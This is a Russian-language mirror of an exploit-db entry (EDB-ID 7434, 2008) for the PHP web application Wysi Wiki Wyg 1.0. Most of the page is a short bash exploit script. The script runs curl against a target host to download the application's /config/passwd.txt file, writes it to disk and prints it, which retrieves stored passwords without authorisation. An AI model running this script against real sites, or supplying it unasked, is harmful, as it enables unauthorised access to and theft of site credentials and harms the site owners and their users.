- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7434
- Проверка EDB
-
- Пройдено
- Автор
- STAKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-12-12
Код:
#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker[at]hotmail[dot]it
host=$1;
name=$2;
path='/config/passwd.txt';
if [ "$name" = "" ]; then
echo "Usage: bash $0 [host/path] [filename]";
echo "by athos - staker[at]hotmail[dot]it";
exit;
fi;
curl $host/$path > $name;
clear
cat $name;
# milw0rm.com [2008-12-12]
- Источник
- www.exploit-db.com